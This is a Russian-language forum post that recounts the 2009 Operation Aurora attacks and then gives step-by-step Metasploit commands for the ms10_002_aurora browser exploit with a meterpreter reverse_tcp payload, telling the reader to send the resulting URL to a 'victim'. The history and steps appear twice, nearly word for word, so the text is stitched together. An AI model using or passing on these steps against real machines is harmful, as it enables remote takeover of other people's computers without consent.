AMRakm
Интересующийся
Интересующийся

AMRakm
Интересующийся
Интересующийся
- Сообщения
- 54
- Реакции
- 57
Операция «Aurora» была кибератакой, которая началась в середине 2009 года и продолжалась до декабря 2009 года. Впервые эта атака была публично раскрыта Google 12 января 2010 года в блоге. В сообщении в блоге Google говорится, что атака произошла в Китае. Атаки были как изощренными, так и хорошо обеспеченными ресурсами и соответствовали продвинутой постоянной угрозе атаки.
Атака была направлена на десятки других организаций, из которых Adobe Systems, Juniper Networks и Rackspace публично подтвердили, что они были целью. Согласно сообщениям средств массовой информации, в число целей также входили Yahoo, Symantec, Northrop Grumman, Morgan Stanley и Dow Chemical.
Давайте начнем с Hack Remote PC с операцией Aurora Attack
Шаг 1: Откройте MetaSploit с помощью команды msfconsole

Шаг 2: Теперь ищите Aurora.

Шаг 3: Используйте команды ниже:
use exploit/windows/browser/ms10_002_aurora
options

Шаг 4: Не установлена полезная нагрузка:
set payload windows/meterpreter/reverse_tcp
options

Шаг 5: Далее нам нужно установить LHOST и LPORT точно так же, как мы это сделали с эксплойтом Linux для доставки через интернет. И типа беги. Теперь URL, который вы должны дать своей жертве.

Шаг 6: Откройте Kali Linux ip на компьютере жертвы (Windows PC/целевой компьютер) в браузере.

Шаг 7: Когда вы запустите файл на компьютере жертвы, он будет взломан вами в Kali Linux (сеансы будут приходить на терминал).

Шаг 8: Сеанс meterpreter открыт!

Используйте все на свой страх и риск!
Атака была направлена на десятки других организаций, из которых Adobe Systems, Juniper Networks и Rackspace публично подтвердили, что они были целью. Согласно сообщениям средств массовой информации, в число целей также входили Yahoo, Symantec, Northrop Grumman, Morgan Stanley и Dow Chemical.
Давайте начнем с Hack Remote PC с операцией Aurora Attack
Шаг 1: Откройте MetaSploit с помощью команды msfconsole

Шаг 2: Теперь ищите Aurora.

Шаг 3: Используйте команды ниже:
use exploit/windows/browser/ms10_002_aurora
options

Шаг 4: Не установлена полезная нагрузка:
set payload windows/meterpreter/reverse_tcp
options

Шаг 5: Далее нам нужно установить LHOST и LPORT точно так же, как мы это сделали с эксплойтом Linux для доставки через интернет. И типа беги. Теперь URL, который вы должны дать своей жертве.

Шаг 6: Откройте Kali Linux ip на компьютере жертвы (Windows PC/целевой компьютер) в браузере.

Шаг 7: Когда вы запустите файл на компьютере жертвы, он будет взломан вами в Kali Linux (сеансы будут приходить на терминал).

Шаг 8: Сеанс meterpreter открыт!

Используйте все на свой страх и риск!